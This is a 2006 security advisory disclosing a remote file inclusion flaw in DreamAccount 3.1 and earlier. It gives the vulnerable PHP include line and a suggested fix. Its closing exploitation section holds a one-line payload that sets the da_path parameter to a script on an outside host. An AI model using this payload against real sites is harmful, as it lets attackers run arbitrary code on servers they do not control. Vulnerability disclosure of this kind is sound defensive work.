[MajorSecurity #8]DreamAccount <= 3.1 - Remote File Include Vulnerability

-------------------------------------------------------------------------


Software: DreamAccount


Version: <=3.1


Type: Remote File Include Vulnerability


Date: June, 3rd 2006


Vendor: dreamcost  


Page: http://dreamcost.com


Risc: High


Credits:

----------------------------


Discovered by: David 'Aesthetico' Vieira-Kurz

http://www.majorsecurity.de


Original Advisory:

----------------------------

http://www.majorsecurity.de/advisory/major_rls8.txt


Affected Products:

----------------------------


DreamAccount 3.1 and prior


Description:

----------------------------


DreamAccount is a membership and subscription software application that is both 
simple to use and install, 

while remaining affordable enough for even the smallest startup.


Requirements:

----------------------------


register_globals = On


Vulnerability:

----------------------------


Input passed to the "da_path" parameter in "auth.cookie.inc.php" is not

properly verified, before it is used to include files.

This can be exploited to execute arbitrary code by including files from 
external resources.


Solution:

----------------------------


I think you can fix this bug by replacing the following vulnerable code in the 

"auth.cookie.inc.php" with my one. It should fix the vulnerabilty and solve this

problem.


Vulnerable one:   "require($da_path . "setup.php");"

MajorSecurity fix: "require("setup.php");"


Set "register_globals" to "Off".


Exploitation:

----------------------------


Post data:


da_path=http://www.yourspace.com/yourscript.php?

Reply via email to